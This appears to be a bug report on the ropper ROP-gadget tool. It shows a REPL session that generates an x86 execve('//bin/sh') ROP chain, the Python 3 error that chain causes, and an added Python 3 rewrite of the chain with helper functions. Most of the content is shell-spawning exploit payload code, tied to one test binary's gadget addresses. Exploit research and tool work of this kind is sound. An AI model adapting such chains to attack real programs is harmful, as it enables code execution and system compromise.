Display information about files in different file formats and find gadgets to build ROP chains for different architectures (x86/x86_64, ARM/ARM64, MIPS, PowerPC, SPARC64). For disassembly ropper uses the awesome Capstone Framework.
Attempting to create a chain for a test x86 binary spits out a script which doesn't work under Python 3. It looks like the chain generation code assumes strings are bytes in a number of places and needs to use the print() function rather than the print statement at the end of the generated script.
Python 3.9.2 (default, Feb 20 2021, 00:00:00)
[GCC 10.2.1 20201125 (Red Hat 10.2.1-9)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ropper
>>> rs = ropper.RopperService()
>>> rs.addFile("test_binary")
>>> rs.loadGadgetsFor()
>>> chain = rs.createRopChain('execve', 'x86')
>>> print(chain)
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # f8dae6777aaff082530fbde77fc04c2e3a25b15e3332da586f14aee10de1816c
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = ''
rop += rebase_0(0x00075d86) # 0x080bdd86: pop eax; ret;
rop += '//bi'
rop += rebase_0(0x00027c0b) # 0x0806fc0b: pop edx; ret;
rop += rebase_0(0x000a9060)
rop += rebase_0(0x0000fbc5) # 0x08057bc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00075d86) # 0x080bdd86: pop eax; ret;
rop += 'n/sh'
rop += rebase_0(0x00027c0b) # 0x0806fc0b: pop edx; ret;
rop += rebase_0(0x000a9064)
rop += rebase_0(0x0000fbc5) # 0x08057bc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x00075d86) # 0x080bdd86: pop eax; ret;
rop += p(0x00000000)
rop += rebase_0(0x00027c0b) # 0x0806fc0b: pop edx; ret;
rop += rebase_0(0x000a9068)
rop += rebase_0(0x0000fbc5) # 0x08057bc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000001db) # 0x080481db: pop ebx; ret;
rop += rebase_0(0x000a9060)
rop += rebase_0(0x00035225) # 0x0807d225: pop ecx; and al, 0x81; ret;
rop += rebase_0(0x000a9068)
rop += rebase_0(0x00027c0b) # 0x0806fc0b: pop edx; ret;
rop += rebase_0(0x000a9068)
rop += rebase_0(0x00075d86) # 0x080bdd86: pop eax; ret;
rop += p(0x0000000b)
rop += rebase_0(0x00028550) # 0x08070550: int 0x80; ret;
print rop
>>> d = dict()
>>> exec(chain, d)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 36
print rop
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(rop)?
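The same execve chain rewritten so it runs under Python 3, as an added example (it is not ropper's output and not part of the original issue). The image base, the scratch address and the gadget offsets are copied from the generated script above; the helper names (store, build_execve_chain, decode_writes) are this example's own. Every piece of the chain is bytes rather than str, pack uses an explicit little-endian format, and the script writes the raw chain to stdout instead of print(), because in Python 3 print(rop) would emit the repr b'...' rather than the raw bytes.

```python
#!/usr/bin/env python3
# Python 3 rewrite of the execve chain ropper generated in the transcript above.
# Added example, not ropper's own code: image base, scratch address and gadget
# offsets are taken from the generated script; helper names are assumptions.
import sys
from struct import pack, unpack

IMAGE_BASE_0 = 0x08048000   # image base ropper reported for the test binary
SCRATCH = 0x000a9060        # writable location ropper picked for "//bin/sh"

# gadget offsets relative to IMAGE_BASE_0, as in the generated script
POP_EAX = 0x00075d86        # 0x080bdd86: pop eax; ret
POP_EDX = 0x00027c0b        # 0x0806fc0b: pop edx; ret
MOV_EDX_EAX = 0x0000fbc5    # 0x08057bc5: mov dword ptr [edx], eax; ret
POP_EBX = 0x000001db        # 0x080481db: pop ebx; ret
POP_ECX = 0x00035225        # 0x0807d225: pop ecx; and al, 0x81; ret
INT_80 = 0x00028550         # 0x08070550: int 0x80; ret

SYS_EXECVE = 11             # i386 execve syscall number


def p(x):
    """32-bit little-endian word as bytes. The generated pack('I', x) is
    native order and size, which is the same thing on x86."""
    return pack('<I', x)


def rebase_0(x):
    return p(x + IMAGE_BASE_0)


def store(addr_off, value):
    """The chain's write primitive: pop eax; pop edx; mov [edx], eax.
    Writes the 4-byte `value` to IMAGE_BASE_0 + addr_off."""
    assert len(value) == 4
    return (rebase_0(POP_EAX) + value
            + rebase_0(POP_EDX) + rebase_0(addr_off)
            + rebase_0(MOV_EDX_EAX))


def build_execve_chain():
    """Same gadgets in the same order as the generated script, but every
    piece is bytes, so Python 3 can concatenate them."""
    rop = b''
    rop += store(SCRATCH, b'//bi')              # "//bin/sh" written 4 bytes at a time
    rop += store(SCRATCH + 4, b'n/sh')
    rop += store(SCRATCH + 8, p(0))             # NUL terminator, doubles as the NULL argv/envp entry
    rop += rebase_0(POP_EBX) + rebase_0(SCRATCH)        # ebx = filename
    rop += rebase_0(POP_ECX) + rebase_0(SCRATCH + 8)    # ecx = argv (points at the NULL dword)
    rop += rebase_0(POP_EDX) + rebase_0(SCRATCH + 8)    # edx = envp (same NULL dword)
    rop += rebase_0(POP_EAX) + p(SYS_EXECVE)            # eax = 11; set last because the
    rop += rebase_0(INT_80)                             # pop ecx gadget clobbers al
    return rop


def decode_writes(chain):
    """Recover every pop eax / pop edx / mov [edx], eax write from a chain.
    Returns {absolute address: 4-byte value}. Only the write pattern used by
    this chain is recognised; it is a sanity check, not an emulator."""
    words = [chain[i:i + 4] for i in range(0, len(chain), 4)]
    writes = {}
    i = 0
    while i + 4 < len(words):
        if (words[i] == rebase_0(POP_EAX)
                and words[i + 2] == rebase_0(POP_EDX)
                and words[i + 4] == rebase_0(MOV_EDX_EAX)):
            addr = unpack('<I', words[i + 3])[0]
            writes[addr] = words[i + 1]
            i += 5
        else:
            i += 1
    return writes


if __name__ == '__main__':
    # raw bytes, not the repr that print(rop) would produce in Python 3
    sys.stdout.buffer.write(build_execve_chain())
```

decode_writes is the check worth keeping around when hand-editing a generated chain: joining its values in address order should spell out "//bin/sh" followed by the NUL dword, which confirms the string pieces survived the str/bytes conversion intact.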